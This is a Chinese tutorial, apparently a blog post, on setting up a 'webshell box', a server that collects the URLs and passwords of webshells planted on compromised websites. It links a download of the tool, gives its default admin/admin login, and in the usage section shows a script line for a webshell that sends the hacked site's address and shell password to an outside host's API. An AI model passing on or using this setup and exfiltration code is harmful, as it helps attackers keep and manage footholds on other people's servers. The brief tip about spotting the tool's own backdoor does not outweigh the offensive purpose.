目录

webshell搭建

错误过程：

错误一： 

错误二：

错误三：

正确搭建过程：

第一步：软件下载

第二步：放在网站目录下

第三步：将asp服务器放在网站目录下

第四步：打开webshell_box

警示：

使用方法：

---

webshell搭建 

错误过程：

错误一： 

下载后直接将asp服务器（Sws）直接放在webshell_box文件里面

错误二：

使用与asp服务器环境不相匹配的系统安装

错误三：

错误打开方式，即使用打开其他网站一样的方式输入地址打开

正确搭建过程：

第一步：软件下载

链接：https://pan.baidu.com/s/1wlnQVd6wd0oEXvKjD7SnRw?pwd=hj12 
提取码：hj12

（内含webshellbox和asp服务器Sws）

Sws我测试的时候不支持win11（准确的说，是Sws支持win10以及以前的版本，毕竟已经老东西了）

如果不行就换小旋风等其他asp服务器试试

但是像我们这样的，应该会有虚拟机，我用我的win7搭建又搭建了一遍

（下一个phpstudy就可以了）

（我是没放后门的，自证清白，人在做天在看，举头三尺有神明） 

第二步：放在网站目录下

 这个网站目录即phpstudy的www下

第三步：将asp服务器放在网站目录下

 （这个要根据所下载的asp的服务器的使用方法确定）

Sws是这样用的，如果下其他的服务器，请参考一下说明

把这个复制粘贴到目录下

第四步：打开webshell_box

在目录下，双击Sws2.3就可以直接在浏览器中打开了

然后先加载出来一个登录页面

账号：admin

密码：admin

警示：

 点开系统设置的时候，有乱码，应该是被编码过

据我推测解码后会有后门

（我先声明不是我干的）

 

使用方法：

一般就是在小马里面制作后门，也就是调用了webshell箱子的api

（要认真学一下木马）

<script src=""http://xxx/api.aspurl="&server.URLEncode("""http://"&request.ServerVariables("HTTP_HOST")&request.ServerVariables("url"))&"&pass="&UserPass&"""></script>

（在网盘里面有）

下面2个实现获取当前网站的ip地址

&_SERVER["PHP_SELE"];正在执行的脚本文件名

$_SERVER["HTTP_HOST"];获取当前请求的host头部内容，即网站地址

 然后将小马到处……

然后会返回URL、密码、后门服务器

一般打开开发者模式，点击网络，查看有没有传向其他地址的数据包，查看有没有后门